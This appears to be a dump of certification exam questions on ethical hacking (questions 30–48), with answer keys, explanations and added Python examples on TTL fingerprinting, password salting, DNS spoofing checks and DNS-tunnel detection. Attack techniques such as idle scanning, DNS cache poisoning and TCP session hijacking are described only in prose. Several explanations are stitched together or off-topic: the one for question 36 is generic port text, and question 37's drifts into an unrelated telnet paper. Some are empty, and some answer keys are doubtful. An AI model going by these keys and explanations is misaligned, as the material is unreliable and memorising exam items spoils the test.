Time to Live (TTL) represents the number of 'hops' a packet can take before it is considered invalid. For Windows/Windows Phone, this value is 128. This value is 64 for Linux/Android.
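
Added example, not from the original explanation: a small Python helper that pulls the ttl field out of ping-style output and rounds it up to the nearest default initial TTL listed above, reading the difference as the hop count. The three defaults are the ones the explanation names; the sample lines and the regular expression are constructed for the demonstration.

```python
import re
from typing import Optional, Tuple

# Default initial TTLs quoted in the explanation above.  Other vendor defaults
# (for example 30 or 60 on some older systems) are deliberately not modelled.
INITIAL_TTLS = {
    64: "Linux/Android",
    128: "Windows/Windows Phone",
    255: "OpenBSD and many network devices",
}

# Matches the ttl field of ping / tcpdump style output.
TTL_RE = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def ttl_from_line(line: str) -> Optional[int]:
    """Pull the TTL out of a single line of tool output, if present."""
    m = TTL_RE.search(line)
    return int(m.group(1)) if m else None


def guess_os_from_ttl(observed_ttl: int) -> Optional[Tuple[int, int, str]]:
    """Return (initial_ttl, hop_count, os_family) for a TTL seen in a reply.

    Every router on the path decrements TTL by one, so a reply from a remote
    host arrives with a value somewhat below its starting TTL.  Round the
    observed value up to the next known default and read the difference as
    the hop count.  The guess is ambiguous on long paths: a TTL of 60 is a
    Linux host 4 hops away or, far less plausibly, a Windows host 68 hops
    away; the smallest hop count wins here.  Hosts whose initial TTL has been
    changed from the default will be mis-classified by this heuristic.
    """
    if not 1 <= observed_ttl <= 255:
        return None
    for initial in sorted(INITIAL_TTLS):
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, INITIAL_TTLS[initial]
    return None


if __name__ == "__main__":
    # Constructed sample lines, not real captures.
    samples = [
        "64 bytes from 192.0.2.10: icmp_seq=1 ttl=128 time=0.41 ms",
        "64 bytes from 192.0.2.20: icmp_seq=1 ttl=117 time=23.7 ms",
        "64 bytes from 192.0.2.30: icmp_seq=1 ttl=52 time=41.0 ms",
    ]
    for line in samples:
        ttl = ttl_from_line(line)
        print(line.split()[3], ttl, guess_os_from_ttl(ttl))
```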

QUESTION 30
Ethical hacker Jane Doe is attempting to crack the password of the head of the IT department of ABC company. She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting. What countermeasure is the company using to protect against rainbow tables?

A. Password key hashing
B. Password salting
C. Password hashing
D. Account lockout

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Passwords are usually described as "hashed and salted". Salting is simply the addition of a unique, random string of characters known only to the site to every password before it is hashed; typically this "salt" is placed in front of each password.
The salt value needs to be stored by the site, which means typically sites use the same salt for each password. This makes it less effective than if individual salts are used.
The use of unique salts means that common passwords shared by multiple users, like "123456" or "password", aren't revealed immediately when one such hashed password is known, because despite the passwords being the same the salted and hashed values are not.
Large salts also protect against certain methods of attack on hashes, including rainbow tables or logs of hashed passwords previously broken. Both hashing and salting may be repeated more than once to increase the difficulty of breaking the security.
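
As an added example that is not part of the original explanation, the following Python shows the difference described above: an unsalted hash, where two users with the same password produce the same stored value, beside a per-user random salt combined with an iterated hash (PBKDF2-HMAC-SHA256 from the standard library). The iteration count, salt length and the small in-memory credential store are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

# Work factor for PBKDF2-HMAC-SHA256 (assumed value for the demonstration;
# pick it so that one hash costs tens of milliseconds on the login server).
ITERATIONS = 100_000
SALT_BYTES = 16


def unsalted_hash(password: str) -> str:
    """The scheme a rainbow table is built for: equal passwords give equal
    hashes, so one precomputed table cracks every user at once."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted, iterated hash.  A fresh random salt per user means an attacker
    would need a separate rainbow table for every salt value in the database."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)


# Minimal credential store (assumption): username -> (salt, digest).
# The salt is stored next to the digest; it is not secret, only unique.
CREDENTIALS: Dict[str, Tuple[bytes, bytes]] = {}


def register(username: str, password: str) -> None:
    CREDENTIALS[username] = hash_password(password)


def login(username: str, password: str) -> bool:
    record = CREDENTIALS.get(username)
    if record is None:
        return False
    return verify_password(password, *record)


if __name__ == "__main__":
    register("alice", "123456")
    register("bob", "123456")
    print("unsalted digests equal:", unsalted_hash("123456") == unsalted_hash("123456"))
    print("salted digests equal:  ", CREDENTIALS["alice"][1] == CREDENTIALS["bob"][1])
    print("alice login ok:        ", login("alice", "123456"))
    print("alice wrong password:  ", login("alice", "password"))
```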

QUESTION 31
Which of the following protocols can be used to secure an LDAP service against anonymous queries?

A. SSO
B. RADIUS
C. WPA
D. NTLM

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
In a Windows network, NT (New Technology) LAN Manager (NTLM) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN), an older Microsoft product. The NTLM protocol suite is implemented in a Security Support Provider, which combines the LAN Manager authentication protocol, NTLMv1, NTLMv2 and NTLM2 Session protocols in a single package. Whether these protocols are used or can be used on a system is governed by Group Policy settings, for which different versions of Windows have different default settings. NTLM passwords are considered weak because they can be brute-forced very easily with modern hardware.
NTLM is a challenge-response authentication protocol which uses three messages to authenticate a client in a connection-oriented environment (connectionless is similar), and a fourth additional message if integrity is desired. First, the client establishes a network path to the server and sends a NEGOTIATE_MESSAGE advertising its capabilities.
Next, the server responds with CHALLENGE_MESSAGE, which is used to establish the identity of the client. Finally, the client responds to the challenge with an AUTHENTICATE_MESSAGE.
The NTLM protocol uses one or both of two hashed password values, both of which are also stored on the server (or domain controller), and which through a lack of salting are password equivalent, meaning that if you grab the hash value from the server, you can authenticate without knowing the actual password. The two are the LM Hash (a DES-based function applied to the first 14 chars of the password converted to the traditional 8-bit PC charset for the language), and the NT Hash (MD4 of the little endian UTF-16 Unicode password). Both hash values are 16 bytes (128 bits) each.
The NTLM protocol also uses one of two one-way functions, depending on the NTLM version. NT LanMan and NTLM version 1 use the DES-based LanMan one-way function (LMOWF), while NTLMv2 uses the NT MD4-based one-way function (NTOWF).

QUESTION 32
Allen, a professional pen tester, was hired by xpertTech solutions to perform an attack simulation on the organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration. Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user.

A. <1B>
B. <00>
C. <03>
D. <20>

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
<03>
Windows Messenger service
Messenger service is a network-based system notification Windows service by Microsoft that was included in some earlier versions of Microsoft Windows. This retired technology, even though it has a similar name, is not related in any way to the later, Internet-based Microsoft Messenger service for instant messaging or to Windows Messenger and Windows Live Messenger (formerly named MSN Messenger) client software. The Messenger Service was originally designed for use by system administrators to notify Windows users about their networks.[1] It has been used maliciously to present pop-up advertisements to users over the Internet (by using mass-messaging systems which sent a desired message to a specified range of IP addresses). Even though Windows XP includes a firewall, it is not enabled by default. Because of this, many users received such messages. As a result of this abuse, the Messenger Service has been disabled by default in Windows XP Service Pack 2.

QUESTION 33
Which firewall evasion scanning technique makes use of a zombie system that has low network activity as well as its fragment identification numbers?

A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
The idle scan is a TCP port scan method that consists of sending spoofed packets to a computer to find out what services are available. This is accomplished by impersonating another computer whose network traffic is very slow or nonexistent (that is, not transmitting or receiving information). This could be an idle computer, called a "zombie".
This action can be done through common software network utilities such as nmap and hping. The attack involves sending forged packets to a specific machine target in an effort to find distinct characteristics of another zombie machine. The attack is sophisticated because there is no interaction between the attacker computer and the target: the attacker interacts only with the "zombie" computer.
This exploit functions with two purposes, as a port scanner and a mapper of trusted IP relationships between machines. The target system interacts with the "zombie" computer, and differences in behavior can be observed using different "zombies" with evidence of different privileges granted by the target to different computers.
The overall intention behind the idle scan is to "check the port status while remaining completely invisible to the targeted host." The first step in executing an idle scan is to find an appropriate zombie. It needs to assign IP ID packets incrementally on a global (rather than per-host it communicates with) basis. It should be idle (hence the scan name), as extraneous traffic will bump up its IP ID sequence, confusing the scan logic. The lower the latency between the attacker and the zombie, and between the zombie and the target, the faster the scan will proceed. Note that when a port is open, IPIDs increment by 2. Following is the sequence:
Attacker to target -> SYN, target to zombie -> SYN/ACK, zombie to target -> RST (IPID increment by 1)
Now the attacker tries to probe the zombie for the result. Attacker to zombie -> SYN/ACK, zombie to attacker -> RST (IPID increment by 1)
So, in this process the IPID increments by 2 in total.
When an idle scan is attempted, tools (for example nmap) test the proposed zombie and report any problems with it. If one doesn't work, try another. Enough Internet hosts are vulnerable that zombie candidates aren't hard to find. A common approach is to simply execute a ping sweep of some network. Choosing a network near your source address, or near the target, produces better results. You can try an idle scan using each available host from the ping sweep results until you find one that works. As usual, it is best to ask permission before using someone's machines for unexpected purposes such as idle scanning.
Simple network devices often make great zombies because they are commonly both underused (idle) and built with simple network stacks which are vulnerable to IP ID traffic detection. While identifying a suitable zombie takes some initial work, you can keep re-using the good ones. Alternatively, there has been some research on utilizing unintended public web services as zombie hosts to perform similar idle scans. Leveraging the way some of these services perform outbound connections upon user submissions can serve as some kind of poor man's idle scanning.

QUESTION 34
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an
organization?

A. The attacker queries a nameserver using the DNS resolver.
B. The attacker makes a request to the DNS resolver.
C. The attacker forges a reply from the DNS resolver.
D. The attacker uses TCP to poison the DNS resolver.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
https://ru.wikipedia.org/wiki/DNS_spoofing
DNS spoofing is a threat that copies the legitimate server destinations to divert the domain's traffic. Unaware of these attacks, the users are redirected to malicious websites, which results in sensitive and personal data being leaked. It is a method of attack where your DNS server is tricked into saving a fake DNS entry. This will make the DNS server recall a fake site for you, thereby posing a threat to vital information stored on your server or computer.
The cache poisoning codes are often found in URLs sent through spam emails. These emails are sent to prompt users to click on the URL, which infects their computer. When the computer is poisoned, it will divert you to a fake IP address that looks like the real thing. This way, the threats are injected into your systems as well.
Different stages of a DNS cache poisoning attack:
- The attacker proceeds to send DNS queries to the DNS resolver, which forwards the request to the Root/TLD authoritative DNS server and awaits an answer.
- The attacker overloads the DNS resolver with poisoned responses that contain several IP addresses of the malicious website. To be accepted by the DNS resolver, the attacker's response must match the port number and the query ID field of the outstanding query and arrive before the legitimate DNS response. The attacker can also send many responses to increase their chance of success.
- If you are a legitimate user who queries this DNS resolver, you will get a poisoned response from the cache, and you will be automatically redirected to the malicious website.
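
The second stage above hinges on the resolver matching the transaction ID and the source port of its outstanding query before it accepts a reply. As an added example (not from the original page), this Python toy resolver applies exactly that check, and a helper computes how likely a batch of blind forged replies is to be accepted with and without source-port randomization. The ephemeral port range and the model of one independent guess per forged packet are assumptions made for the illustration.

```python
import random
from dataclasses import dataclass, field
from typing import Dict

TXID_SPACE = 65536              # 16-bit DNS transaction ID
EPHEMERAL_PORTS = 65535 - 1024  # source ports the toy resolver may pick (assumed range)


@dataclass(frozen=True)
class PendingQuery:
    qname: str
    txid: int
    src_port: int


@dataclass
class Resolver:
    """Toy stub resolver: records what it sent, then accepts only a reply
    whose transaction ID and destination port match that record."""
    randomize_ports: bool = True
    rng: random.Random = field(default_factory=random.Random)
    cache: Dict[str, str] = field(default_factory=dict)
    pending: Dict[str, PendingQuery] = field(default_factory=dict)

    def send_query(self, qname: str) -> PendingQuery:
        txid = self.rng.randrange(TXID_SPACE)
        # Old resolvers used a fixed source port, so only the 16-bit ID had to
        # be guessed; randomizing the port multiplies the search space.
        port = self.rng.randrange(1024, 65535) if self.randomize_ports else 53
        q = PendingQuery(qname, txid, port)
        self.pending[qname] = q
        return q

    def receive_reply(self, qname: str, txid: int, dst_port: int, answer: str) -> bool:
        """Return True if the reply was accepted into the cache."""
        q = self.pending.get(qname)
        if q is None or txid != q.txid or dst_port != q.src_port:
            return False            # forged or stale: dropped, cache untouched
        self.cache[qname] = answer
        del self.pending[qname]     # first matching reply wins; later ones are ignored
        return True


def blind_guess_success(randomize_ports: bool, forged_replies: int) -> float:
    """Probability that at least one of `forged_replies` blind guesses matches
    both the transaction ID and (when randomized) the source port."""
    space = TXID_SPACE * (EPHEMERAL_PORTS if randomize_ports else 1)
    return 1 - (1 - 1 / space) ** forged_replies


if __name__ == "__main__":
    r = Resolver(randomize_ports=True)
    q = r.send_query("www.example.com")
    print("wrong txid accepted:", r.receive_reply(q.qname, (q.txid + 1) % TXID_SPACE, q.src_port, "203.0.113.9"))
    print("right reply accepted:", r.receive_reply(q.qname, q.txid, q.src_port, "192.0.2.1"))
    print("fixed port, 65536 forgeries:", round(blind_guess_success(False, 65536), 3))
    print("random port, 65536 forgeries:", blind_guess_success(True, 65536))
```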

QUESTION 35
In an attempt to increase the security of your network, you implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know it. How do you accomplish this?

A. Delete the wireless network
B. Remove all passwords
C. Lock all users
D. Disable SSID broadcasting

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
The SSID (service set identifier) is the name of your wireless network. SSID broadcast is how your router transmits this name to surrounding devices. Its primary function is to make your network visible and easily accessible. Most routers broadcast their SSIDs automatically. To disable or enable SSID broadcast, you need to change your router's settings.
Disabling SSID broadcast will make your Wi-Fi network name invisible to other users. However, this only hides the name, not the network itself. You cannot disguise the router's activity, so hackers can still attack it.
With your network invisible to wireless devices, connecting becomes a bit more complicated. Just giving a Wi-Fi password to your guests is no longer enough. They have to configure their settings manually by including the network name, security mode, and other relevant info. Disabling SSID might be a small step towards online security, but by no means should it be your final one. Before considering it as a security measure, consider the following aspects:
- Disabling SSID broadcast will not hide your network completely
Disabling SSID broadcast only hides the network name, not the fact that it exists. Your router constantly
transmits so-called beacon frames to announce the presence of a wireless network. They contain essential
information about the network and help the device connect.
- Third-party software can easily trace a hidden network
Programs such as NetStumbler or Kismet can easily locate hidden networks. You can try using them yourself to
see how easy it is to find available networks hidden or not.
- You might attract unwanted attention.
Disabling your SSID broadcast could also raise suspicion. Most of us assume that when somebody hides
something, they have a reason to do so. Thus, some hackers might be attracted to your network.

QUESTION 36
What is the port to block first in case you are suspicious that an IoT device has been compromised?

A. 22
B. 443
C. 48101
D. 80

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
TCP port 48101 uses the Transmission Control Protocol. TCP is one of the main protocols in TCP/IP networks. TCP is a connection-oriented protocol; it requires handshaking to set up end-to-end communications. Only when a connection is set up can the user's data be sent bi-directionally over the connection.
Attention! TCP guarantees delivery of data packets on port 48101 in the same order in which they were sent. Guaranteed communication over TCP port 48101 is the main difference between TCP and UDP. UDP port 48101 would not have guaranteed communication as TCP does.
UDP on port 48101 provides an unreliable service and datagrams may arrive duplicated, out of order, or missing without notice. UDP on port 48101 assumes that error checking and correction is not necessary or is performed in the application, avoiding the overhead of such processing at the network interface level.
UDP (User Datagram Protocol) is a minimal message-oriented Transport Layer protocol (the protocol is documented in IETF RFC 768). Application examples that often use UDP: voice over IP (VoIP), streaming media and real-time multiplayer games. Many Internet applications use UDP, e.g. the Domain Name System (DNS), the Routing Information Protocol (RIP), the Dynamic Host Configuration Protocol (DHCP), the Simple Network Management Protocol (SNMP).

QUESTION 37
Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls. On which of the following ports should Robin run the NSTX tool?

A. Port 53
B. Port 23
C. Port 50
D. Port 80

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
DNS uses port 53, which is almost always open on systems, firewalls, and clients to transmit DNS queries. Instead of the more familiar Transmission Control Protocol (TCP), these queries use User Datagram Protocol (UDP) because of its low latency, bandwidth and resource usage compared to TCP-equivalent queries. UDP has no error or flow-control capabilities, nor does it have any integrity checking to make sure the data arrived intact (it's a best-effort protocol after all).
How is Internet use (browsing, apps, chat etc.) so reliable then? If the UDP DNS query fails in the first instance, most systems will retry a number of times and only after multiple failures, potentially switch to TCP before trying again; TCP is also used if the DNS query exceeds the limitations of the UDP datagram size, typically 512 bytes for DNS but can depend upon system settings.
Figure 1 below illustrates the basic process of how DNS operates: the client sends a query string (for example, mail.google[.]com in this case) with a particular type, typically A for a host address. I've skipped the part whereby intermediate DNS systems may need to establish where `.com' exists, before finding out where `google[.]com' can be found, and so on.
Once a name is resolved to an IP, caching also helps: the resolved name-to-IP is typically cached on the local system (and possibly on intermediate DNS servers) for a period of time. Subsequent queries for the same name from the same client then don't leave the local system until said cache expires. Of course, once the IP address of the remote service is known, applications can use that information to enable other TCP-based protocols, such as HTTP, to do their actual work, for instance ensuring Internet cat GIFs can be reliably shared with your colleagues.
So, all in all, a few dozen extra UDP DNS queries from an organization's network would be fairly inconspicuous and could leave a malicious payload to beacon out to an adversary; commands could even be received to the requesting application for processing with little difficulty.
Many worms and scanners have been created to find and exploit systems running telnet. Given these facts, it's really no surprise that telnet is often seen on the Top Ten Target Ports list. Several of the vulnerabilities of telnet have been fixed. They require only an upgrade to the most current version of the telnet daemon or an OS upgrade. As is often the case, this upgrade has not been performed on a number of devices. This may be due to the fact that many systems administrators and users don't fully understand the risks involved in using telnet. Unfortunately, the only solution for some of telnet's vulnerabilities is to completely discontinue its use. The preferred method of mitigating all of telnet's vulnerabilities is replacing it with alternate protocols such as ssh. Ssh is capable of providing many of the same functions as telnet and a number of additional services typically handled by other protocols such as FTP and Xwindows. Ssh does still have several drawbacks to overcome before it can completely replace telnet. It is typically only supported on newer equipment. It requires processor and memory resources to perform the data encryption and decryption. It also requires greater bandwidth than telnet due to the encryption of the data. This paper was written to help clarify how dangerous the use of telnet can be and to provide solutions to alleviate the major known threats in order to enhance the overall security of the Internet.

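
The paragraph above on beaconing explains why a trickle of extra DNS queries is easy to miss. As an added example, not taken from the original explanation, the following Python runs a simple tunnel heuristic over constructed resolver log lines: for each client and registrable domain it looks for a run of queries whose left-hand labels are long, unique and high in entropy, which is the shape encoded data takes when it is carried inside query names. The log format, the thresholds and the two-label base-domain cut are assumptions made for the demonstration.

```python
import hashlib
import math
from collections import defaultdict
from typing import Dict, List, Tuple


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking encoded data scores high."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname: str, labels: int = 2) -> str:
    """Crude registrable-domain cut (assumption: last two labels; production
    code would consult the public suffix list instead)."""
    return ".".join(qname.rstrip(".").split(".")[-labels:])


def analyse(lines: List[str], min_queries: int = 5, min_entropy: float = 3.0,
            min_prefix_len: int = 20) -> List[Tuple[str, str]]:
    """Return (client, base_domain) pairs whose query pattern looks like a
    tunnel: many queries, nearly all with a unique, long, high-entropy prefix.
    Log line format (assumed): '<timestamp> <client> <qtype> <qname>'."""
    stats = defaultdict(lambda: {"queries": 0, "unique": set(), "entropy": 0.0, "length": 0})
    for line in lines:
        if not line.strip():
            continue
        _ts, client, _qtype, qname = line.split()
        base = base_domain(qname)
        # Everything left of the base domain is where a tunnel carries its data.
        prefix = qname[: len(qname) - len(base)].rstrip(".")
        s = stats[(client, base)]
        s["queries"] += 1
        s["unique"].add(prefix)
        s["entropy"] += shannon_entropy(prefix.replace(".", ""))
        s["length"] += len(prefix)
    flagged = []
    for key, s in stats.items():
        n = s["queries"]
        if (n >= min_queries
                and len(s["unique"]) / n >= 0.9
                and s["entropy"] / n >= min_entropy
                and s["length"] / n >= min_prefix_len):
            flagged.append(key)
    return sorted(flagged)


def constructed_log() -> List[str]:
    """Constructed resolver log, not a real capture: ordinary lookups from one
    client and a burst of hex-encoded TXT queries from another."""
    lines = [
        "2024-05-01T10:00:01 10.0.0.12 A mail.google.com",
        "2024-05-01T10:00:02 10.0.0.12 A www.example.org",
        "2024-05-01T10:00:03 10.0.0.12 AAAA www.example.org",
        "2024-05-01T10:00:04 10.0.0.12 A cdn.example.org",
    ]
    for i in range(8):
        # Hex digests stand in for the encoded chunks a tunnel client emits.
        chunk = hashlib.sha256(f"constructed chunk {i}".encode()).hexdigest()
        lines.append(f"2024-05-01T10:00:0{i} 10.0.0.31 TXT {chunk}.c.tunnel.example.net")
    return lines


if __name__ == "__main__":
    for client, domain in analyse(constructed_log()):
        print(f"possible DNS tunnel: client {client} -> {domain}")
```

Thresholds like these produce false positives on legitimate high-volume services that also use hashed labels (content delivery networks, some anti-spam lookups), so in practice the output is an allow-listed triage queue rather than a blocking rule.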
QUESTION 38
Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What is the type of vulnerability assessment that Morris performed on the target organization?

A. internal assessment
B. Passive assessment
C. External assessment
D. Credentialed assessment

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Passive Assessment Passive assessments sniff the traffic present on the network to identify the active
systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the
users who are currently accessing the network.

QUESTION 39
Bob, an attacker, has managed to access a target IoT device. He employed an online tool to gather information related to the model of the IoT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above information?

A. search.com
B. EarthExplorer
C. Google image search
D. FCC ID search

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Footprinting techniques are used to collect basic information about the target IoT and OT platforms to exploit them. Information collected through footprinting techniques includes IP address, hostname, ISP, device location, banner of the target IoT device, FCC ID information, certification granted to the device, etc. (pg. 5052, CEHv11 manual)
https://en.wikipedia.org/wiki/FCC_mark
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. For legal sale of wireless devices in the US, manufacturers must:
· Have the device evaluated by an independent lab to ensure it conforms to FCC standards
· Provide documentation to the FCC of the lab results
· Provide User Manuals, Documentation, and Photos relating to the device
· Digitally or physically label the device with the unique identifier provided by the FCC (upon approved application)
The FCC gets its authority from Title 47 of the Code of Federal Regulations (47 CFR). FCC IDs are required for all wireless emitting devices sold in the USA. By searching an FCC ID, you can find details on the wireless operating frequency (including strength), photos of the device, user manuals for the device, and SAR reports on the wireless emissions.

QUESTION 40
Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

A. Enable unused default user accounts created during the installation of an OS
B. Enable all non-interactive accounts that should exist but do not require interactive login
C. Limit the administrator or root-level access to the minimum number of users
D. Retain all unused modules and application extensions

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:

QUESTION 41
Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates.
Which of the following protocols is used by Bella?

A. FTP
B. HTTPS
C. FTPS
D. IP

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of computer files from a server to a client on a computer network. FTP is built on a client-server model architecture using separate control and data connections between the client and the server.[1] FTP users may authenticate themselves with a clear-text sign-in protocol, normally in the form of a username and password, but can connect anonymously if the server is configured to allow it. For secure transmission that protects the username and password, and encrypts the content, FTP is often secured with SSL/TLS (FTPS) or replaced with SSH File Transfer Protocol (SFTP).
The first FTP client applications were command-line programs developed before operating systems had graphical user interfaces, and are still shipped with most Windows, Unix, and Linux operating systems.[2][3] Many FTP clients and automation utilities have since been developed for desktops, servers, mobile devices, and hardware, and FTP has been incorporated into productivity applications, such as HTML editors.

QUESTION 42
Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries.
Which of the following tiers of the container technology architecture is Abel currently working in?

A. Tier-1: Developer machines
B. Tier-4: Orchestrators
C. Tier-3: Registries
D. Tier-2: Testing and accreditation systems

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Accreditation: the official management decision given by a senior agency official to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security controls. Also: a formal declaration by a designated accrediting authority (DAA) or principal accrediting authority (PAA) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural safeguards. See authorization to operate (ATO).
Rationale: The Risk Management Framework uses a new term to refer to this concept, and it is called authorization.
Accreditation boundary: identifies the information resources covered by an accreditation decision, as distinguished from separately accredited information resources that are interconnected or with which information is exchanged via messaging. Synonymous with Security Perimeter.
For the purposes of identifying the Protection Level for confidentiality of a system to be accredited, the system
has a conceptual boundary that extends to all intended users of the system, both directly and indirectly
connected, who receive output from the system. See authorization boundary. Rationale: The Risk Management
Framework uses a new term to refer to the concept of accreditation, and it is called authorization. Extrapolating,
the accreditation boundary would then be referred to as the authorization boundary.

QUESTION 43
Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device
through Bluetooth?

A. Bluesmacking
B. Bluebugging
C. Bluejacking
D. Bluesnarfing

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
Explanation:
Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection,
often between phones, desktops, laptops, and PDAs (personal digital assistant). Topic 3, Exam Pool C

QUESTION 44
If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall you are scanning?

A. There is no firewall in place.
B. This event does not tell you anything about the firewall.
C. It is a stateful firewall.
D. It is a non-stateful firewall.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Explanation:

QUESTION 45
Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host machine to predict Bob's ISN. Using this ISN, Samuel sent spoofed packets with Bob's IP address to the host machine. The host machine responded with a packet having an incremented ISN. Consequently, Bob's connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the above scenario?

A. UDP hijacking
B. Blind hijacking
C. TCP/IP hacking
D. Forbidden attack

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
A TCP/IP hijack is an attack that spoofs a server into thinking it's talking with a valid client, when in fact it's communicating with an attacker that has taken over (or hijacked) the TCP session.
Assume that the client has administrator-level privileges, which the attacker wants to steal in order to create a new account with root-level access on the server to be used afterward. A TCP hijacking is sort of a two-phased man-in-the-middle attack. The man-in-the-middle attacker lurks in the circuit between a client and a server in order to determine what port and sequence numbers are being used for the conversation. First, the attacker knocks out the client with an attack, such as Ping of Death, or ties it up with some kind of ICMP storm. This renders the client unable to transmit any packets to the server. Then, with the client crashed, the attacker assumes the client's identity in order to talk with the server. By this means, the attacker gains administrator-level access to the server.
One of the most effective means of preventing a hijack attack is to require a secret, that is, a shared secret between the client and the server. Depending on the strength of security desired, the secret may be used for random exchanges. This is when a client and server periodically challenge each other, or it can occur with each exchange, as with Kerberos.

QUESTION 46
Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Polly validating it?

A. Dorian is signing the message with his public key, and Polly will verify that the message came from Dorian by using Dorian's private key.
B. Dorian is signing the message with Polly's public key, and Polly will verify that the message came from Dorian by using Dorian's public key.
C. Dorian is signing the message with his private key, and Polly will verify that the message came from Dorian by using Dorian's public key.
D. Dorian is signing the message with Polly's private key, and Polly will verify that the message came from Dorian by using Dorian's public key.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
https://blog.mailfence.com/how-do-digital-signatures-work/
https://en.wikipedia.org/wiki/Digital_signature
A digital signature is a mathematical technique used to validate the authenticity and integrity of a message,
software, or digital document. It's the digital equivalent of a handwritten signature or stamped seal, but it offers
far more inherent security. A digital signature is intended to solve the problem of tampering and impersonation
in digital communications.
Digital signatures can provide evidence of origin, identity, and status of electronic documents, transactions, or
digital messages. Signers can also use them to acknowledge informed consent. Digital signatures are based on
public-key cryptography, also known as asymmetric cryptography. Two keys are generated using a public key
algorithm, such as RSA (Rivest-Shamir-Adleman), creating a mathematically linked pair of keys, one private
and one public.
Digital signatures work through public-key cryptography's two mutually authenticating cryptographic keys. The
individual who creates the digital signature uses a private key to encrypt signature-related data, while the only
way to decrypt that data is with the signer's public key.

QUESTION 47
Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity
and navigate anonymously to obtain sensitive/hidden information about official government or federal
databases. After gathering the information, he successfully performed an attack on the target government
organization without being traced. Which of the following techniques is described in the above scenario?

A. Dark web footprinting
B. VoIP footprinting
C. VPN footprinting
D. website footprinting

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
Explanation:
The deep web is the layer of the online cyberspace that consists of web pages and content that are hidden and
unindexed.

QUESTION 48
An organization has automated the operation of critical infrastructure from a remote location. For this purpose,
all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure
the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to
install an OT security tool that further protects against security incidents such as cyber espionage, zero-day
attacks, and malware. Which of the following tools must the organization employ to protect its critical
infrastructure?

A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Explanation:
